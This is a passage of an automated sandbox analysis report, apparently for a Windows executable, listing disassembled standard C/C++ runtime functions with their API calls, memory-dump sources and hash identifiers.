                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                      • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                      • String ID:
                                                                      • API String ID: 2854358121-0
                                                                      • Opcode ID: 372df5b16d12f503fc246fabbf8ed0fca2d99e93db8bee5b1a68cd138d1f1cf0
                                                                      • Instruction ID: 4fcb4e1b03b12506297e3d13950b367805426a282084b4d8a2a94422a674cc50
                                                                      • Opcode Fuzzy Hash: 372df5b16d12f503fc246fabbf8ed0fca2d99e93db8bee5b1a68cd138d1f1cf0
                                                                      • Instruction Fuzzy Hash: 6C01D675900219CBCF01FBA4D8056AE77B2EF80720F29410AF519AB391DF70DE018BB0
                                                                      Function 00D93A80 Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • __EH_prolog3.LIBCMT ref: 00D93A87
                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00D93A91
                                                                        • Part of subcall function 00D7BCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00D7BD10
                                                                        • Part of subcall function 00D7BCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00D7BD38
                                                                      • std::_Facet_Register.LIBCPMT ref: 00D93AE2
                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00D93B02
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                      • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                      • String ID:
                                                                      • API String ID: 2854358121-0
                                                                      • Opcode ID: f3ecd17aeb2655f683bef1284357d9dfc21b0469eff8637ac92cf0be55c68c1b
                                                                      • Instruction ID: 4ddd00f080de999cb1c9644b6827093fb214a5ff0bcd135c54d3fded396dfde2
                                                                      • Opcode Fuzzy Hash: f3ecd17aeb2655f683bef1284357d9dfc21b0469eff8637ac92cf0be55c68c1b
                                                                      • Instruction Fuzzy Hash: 2C0180359002199BCF15FB64D8466AE7761EF84724F28450AE415AB391EF749E018BB4
                                                                      Function 00D87A5E Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • __EH_prolog3.LIBCMT ref: 00D87A65
                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00D87A6F
                                                                        • Part of subcall function 00D7BCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00D7BD10
                                                                        • Part of subcall function 00D7BCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00D7BD38
                                                                      • std::_Facet_Register.LIBCPMT ref: 00D87AC0
                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00D87AE0
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                      • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                      • String ID:
                                                                      • API String ID: 2854358121-0
                                                                      • Opcode ID: 993495c9930b3be448aeb66820aa86016954d8b5fc5edbb40ee0392612b05e73
                                                                      • Instruction ID: f24fe15b0b73efc34c0eea4ac50ec20e89ec392a2c8f06599af6d1cd5b1854d5
                                                                      • Opcode Fuzzy Hash: 993495c9930b3be448aeb66820aa86016954d8b5fc5edbb40ee0392612b05e73
                                                                      • Instruction Fuzzy Hash: 03019E75904219DBCF05FB64D846AAEBB62EF84720F29450AF415AB391EF74DE01CBB0
                                                                      Function 00D87B88 Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • __EH_prolog3.LIBCMT ref: 00D87B8F
                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00D87B99
                                                                        • Part of subcall function 00D7BCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00D7BD10
                                                                        • Part of subcall function 00D7BCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00D7BD38
                                                                      • std::_Facet_Register.LIBCPMT ref: 00D87BEA
                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00D87C0A
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                      • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                      • String ID:
                                                                      • API String ID: 2854358121-0
                                                                      • Opcode ID: e4a1634688396f2864a07531367659b0cf3c4947436373e3897bbc0500463539
                                                                      • Instruction ID: 61925a4a7811edd1cd8d1097a9d3c35b3a56a4daa7be52b058145552c4e40316
                                                                      • Opcode Fuzzy Hash: e4a1634688396f2864a07531367659b0cf3c4947436373e3897bbc0500463539
                                                                      • Instruction Fuzzy Hash: E00180759002199BCF16FB64D8066AEB771EF80720F28440AE415AB392EF74DE01CBB0
                                                                      Function 00D93CD4 Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • __EH_prolog3.LIBCMT ref: 00D93CDB
                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00D93CE5
                                                                        • Part of subcall function 00D7BCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00D7BD10
                                                                        • Part of subcall function 00D7BCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00D7BD38
                                                                      • std::_Facet_Register.LIBCPMT ref: 00D93D36
                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00D93D56
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                      • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                      • String ID:
                                                                      • API String ID: 2854358121-0
                                                                      • Opcode ID: afbf446536c960ca75ed5f3d588e06136c1474407973f34ccfd124ebbcc57860
                                                                      • Instruction ID: d2d7643825287553a45bd6f854d872dc7dc0ca87da57ed688c1e7bbf3328bf9b
                                                                      • Opcode Fuzzy Hash: afbf446536c960ca75ed5f3d588e06136c1474407973f34ccfd124ebbcc57860
                                                                      • Instruction Fuzzy Hash: A00180359002199FCF15EBA4E8566AE7761EF80720F28450AE416AB391EF749E018BB0
                                                                      Function 00D93C3F Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • __EH_prolog3.LIBCMT ref: 00D93C46
                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00D93C50
                                                                        • Part of subcall function 00D7BCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00D7BD10
                                                                        • Part of subcall function 00D7BCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00D7BD38
                                                                      • std::_Facet_Register.LIBCPMT ref: 00D93CA1
                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00D93CC1
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                      • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                      • String ID:
                                                                      • API String ID: 2854358121-0
                                                                      • Opcode ID: af82a6ffedbc7f3cf13fd3ee3eb91e8c691efa0336c35e126d52c44df9a22dc3
                                                                      • Instruction ID: 5919d29b92ecdf11b20d300d6721cd4064b066419762f41c0e9253d35322832c
                                                                      • Opcode Fuzzy Hash: af82a6ffedbc7f3cf13fd3ee3eb91e8c691efa0336c35e126d52c44df9a22dc3
                                                                      • Instruction Fuzzy Hash: 5E01C035900A199BCF01EBA4D8066ADB772EF84720F28440AF415AB391EF709E018BB0
                                                                      Function 00D87E71 Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • __EH_prolog3.LIBCMT ref: 00D87E78
                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00D87E82
                                                                        • Part of subcall function 00D7BCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00D7BD10
                                                                        • Part of subcall function 00D7BCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00D7BD38
                                                                      • std::_Facet_Register.LIBCPMT ref: 00D87ED3
                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00D87EF3
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                      • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                      • String ID:
                                                                      • API String ID: 2854358121-0
                                                                      • Opcode ID: 66ccc9ec7cf02fe47ebb52265d471bdaa423c9a34b1e476a7dc31f0f1e56adfa
                                                                      • Instruction ID: 1a1b3c6627cb9f62545670a8c5f5ebe01af50b4213f30f5aab032205bd730d6a
                                                                      • Opcode Fuzzy Hash: 66ccc9ec7cf02fe47ebb52265d471bdaa423c9a34b1e476a7dc31f0f1e56adfa
                                                                      • Instruction Fuzzy Hash: 1901D63590121ADFCF02FBA4D8166AE7761EF80720F28444AF410A7391EF70DE018BB0
                                                                      Function 00D87F9B Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • __EH_prolog3.LIBCMT ref: 00D87FA2
                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00D87FAC
                                                                        • Part of subcall function 00D7BCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00D7BD10
                                                                        • Part of subcall function 00D7BCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00D7BD38
                                                                      • std::_Facet_Register.LIBCPMT ref: 00D87FFD
                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00D8801D
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                      • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                      • String ID:
                                                                      • API String ID: 2854358121-0
                                                                      • Opcode ID: 93798a263ca35e947ed71177739b907c2a1f5f282a74a04c9a0261b1f81d90e2
                                                                      • Instruction ID: 6f02c963777b311c4f8de1fe9ae7ba38495e321ee520da0c8d97b95970fddc4d
                                                                      • Opcode Fuzzy Hash: 93798a263ca35e947ed71177739b907c2a1f5f282a74a04c9a0261b1f81d90e2
                                                                      • Instruction Fuzzy Hash: CD01D235900219DBCF01FBA4D8566BEB7A1EF80721F28400AF411AB391EF709E019BB0
                                                                      Function 00D87F06 Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • __EH_prolog3.LIBCMT ref: 00D87F0D
                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00D87F17
                                                                        • Part of subcall function 00D7BCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00D7BD10
                                                                        • Part of subcall function 00D7BCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00D7BD38
                                                                      • std::_Facet_Register.LIBCPMT ref: 00D87F68
                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00D87F88
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                      • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                      • String ID:
                                                                      • API String ID: 2854358121-0
                                                                      • Opcode ID: 9ea7381cbe76e1e79452e5674b5d1c12b4f999bb7470c5e42e09d9b60f731ed6
                                                                      • Instruction ID: d6b3c4880c5af4b7f1d3642acc32fee3ca4b3ac6e8a4c5548560365d74aec9e3
                                                                      • Opcode Fuzzy Hash: 9ea7381cbe76e1e79452e5674b5d1c12b4f999bb7470c5e42e09d9b60f731ed6
                                                                      • Instruction Fuzzy Hash: 1B01C0359402199BCB05FBA5D8066AEB762EF80720F28450AF510AB3D1EF74DE018BB0
                                                                      Function 00D85C66 Relevance: 6.0, APIs: 4, Instructions: 44COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • __EH_prolog3.LIBCMT ref: 00D85C6D
                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00D85C78
                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00D85CE6
                                                                        • Part of subcall function 00D85DC8: std::locale::_Locimp::_Locimp.LIBCPMT ref: 00D85DE0
                                                                      • std::locale::_Setgloballocale.LIBCPMT ref: 00D85C93
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                      • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_Setgloballocale
                                                                      • String ID:
                                                                      • API String ID: 677527491-0
                                                                      • Opcode ID: 80e86efa995e8ff8ce2b0eab1453a6bf7f4464d9d08176e0edf6023581ab6711
                                                                      • Instruction ID: 26b77a58511075a56a087db31f74f1a35c6c8ce85e178e8dc7c4e972918709bb
                                                                      • Opcode Fuzzy Hash: 80e86efa995e8ff8ce2b0eab1453a6bf7f4464d9d08176e0edf6023581ab6711
                                                                      • Instruction Fuzzy Hash: 00017C79A01B509BDB06BB20E84557D7BA2FF85750B18400AE81297381DF78AE02DBF5
                                                                      Function 00DB8C76 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,?,00DB8643,?,00000001,?,?,?,00DB7788,?,?,00000000), ref: 00DB8C8D
                                                                      • GetLastError.KERNEL32(?,00DB8643,?,00000001,?,?,?,00DB7788,?,?,00000000,?,?,?,00DB7D0F,?), ref: 00DB8C99
                                                                        • Part of subcall function 00DB8C5F: CloseHandle.KERNEL32(FFFFFFFE,00DB8CA9,?,00DB8643,?,00000001,?,?,?,00DB7788,?,?,00000000,?,?), ref: 00DB8C6F
                                                                      • ___initconout.LIBCMT ref: 00DB8CA9
                                                                        • Part of subcall function 00DB8C21: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00DB8C50,00DB8630,?,?,00DB7788,?,?,00000000,?), ref: 00DB8C34
                                                                      • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,00DB8643,?,00000001,?,?,?,00DB7788,?,?,00000000,?), ref: 00DB8CBE
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                      • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                      • String ID:
                                                                      • API String ID: 2744216297-0
                                                                      • Opcode ID: 19b1b43c3904d348897adbebd0a32746c5f371cfd5c0c2dca247c7a68145df5f
                                                                      • Instruction ID: 961a4b6bdd4158371060993f8aa0047b040ac31a0c982f179c9827de7bdbd679
                                                                      • Opcode Fuzzy Hash: 19b1b43c3904d348897adbebd0a32746c5f371cfd5c0c2dca247c7a68145df5f
                                                                      • Instruction Fuzzy Hash: 2AF0F876501265FBCF262FD5DC049C93F6AEF487A0F144510FA1A95220DA32C920EBB1
                                                                      Function 00D978FD Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SleepConditionVariableCS.KERNELBASE(?,00D9789A,00000064), ref: 00D97920
                                                                      • LeaveCriticalSection.KERNEL32(00DD4AF8,?,?,00D9789A,00000064,?,?,00D725B6,00DD571C,862265DA,?,00000000,00DB93ED,000000FF,?,00D71A26), ref: 00D9792A
                                                                      • WaitForSingleObjectEx.KERNEL32(?,00000000,?,00D9789A,00000064,?,?,00D725B6,00DD571C,862265DA,?,00000000,00DB93ED,000000FF,?,00D71A26), ref: 00D9793B
                                                                      • EnterCriticalSection.KERNEL32(00DD4AF8,?,00D9789A,00000064,?,?,00D725B6,00DD571C,862265DA,?,00000000,00DB93ED,000000FF,?,00D71A26), ref: 00D97942
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                      • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: CriticalSection$ConditionEnterLeaveObjectSingleSleepVariableWait
                                                                      • String ID:
                                                                      • API String ID: 3269011525-0
                                                                      • Opcode ID: 247d017b2f3d81ae490e82e5ad8df8f65ecdc13ed9f032f8fadfae32462a0d16
                                                                      • Instruction ID: b34fbae7d7b152e4509b35189774937dc9769bf53067388c48fe879f6b9d2c9e
                                                                      • Opcode Fuzzy Hash: 247d017b2f3d81ae490e82e5ad8df8f65ecdc13ed9f032f8fadfae32462a0d16
                                                                      • Instruction Fuzzy Hash: 52E09235AC5325FBCB012B50EC08A9D3F15EF04755B054022F945A6360CBB048048BF8
                                                                      Function 00DA709D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 194COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • __startOneArgErrorHandling.LIBCMT ref: 00DA712D
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                      • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorHandling__start
                                                                      • String ID: pow
                                                                      • API String ID: 3213639722-2276729525
                                                                      • Opcode ID: 0314e31c97ef427da8474aecac33324c0738f4e2f847f0a0faf5ebe29661b500
                                                                      • Instruction ID: 170380b30b94b146f72da61a4c18ec9ee8925201cefdd46e785e1f54cfe4adea
                                                                      • Opcode Fuzzy Hash: 0314e31c97ef427da8474aecac33324c0738f4e2f847f0a0faf5ebe29661b500
                                                                      • Instruction Fuzzy Hash: 14513961A0C30396CB1577A4CD4137E6BE4DB53700F288DF9E0D5822E9EB34C8959AB6
                                                                      Function 00D96C34 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 185COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                      • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: __aulldiv
                                                                      • String ID: -$0123456789abcdefghijklmnopqrstuvwxyz
                                                                      • API String ID: 3732870572-1956417402
                                                                      • Opcode ID: 285a729ccb77dea8bd64787266516cac09a834e10420e8c602d88a0f4674cbd9
                                                                      • Instruction ID: 6a06115d7056ba162e0070e5c33caeec6dfe73695abae5b4bfe6adc098f1ce38
                                                                      • Opcode Fuzzy Hash: 285a729ccb77dea8bd64787266516cac09a834e10420e8c602d88a0f4674cbd9
                                                                      • Instruction Fuzzy Hash: 7551D670B042595BDF259E6D88517BEBFFAEF45710F18406AF4E1D7241C274C9428B70
                                                                      Function 00D7F860 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 167COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 00D7FA3E
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                      • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: Concurrency::cancel_current_task
                                                                      • String ID: false$true
                                                                      • API String ID: 118556049-2658103896
                                                                      • Opcode ID: 65e025879fda657d3264aa5630193e2e66d3929f86416dfc4bb0f52f4e112fe3
                                                                      • Instruction ID: 074e9df416605a9c07e26947b0bd5c8e80acfa9bbfd29e4b23c1c312657738eb
                                                                      • Opcode Fuzzy Hash: 65e025879fda657d3264aa5630193e2e66d3929f86416dfc4bb0f52f4e112fe3
                                                                      • Instruction Fuzzy Hash: 325176B1D003489FDB20DFA4C941BEEB7B8FF45314F14826AE849A7281E775A545CB71
                                                                      Function 00D922AA Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 158COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • __EH_prolog3_GS.LIBCMT ref: 00D922B1
                                                                      • _swprintf.LIBCMT ref: 00D92329
                                                                        • Part of subcall function 00D8780A: __EH_prolog3.LIBCMT ref: 00D87811
                                                                        • Part of subcall function 00D8780A: std::_Lockit::_Lockit.LIBCPMT ref: 00D8781B
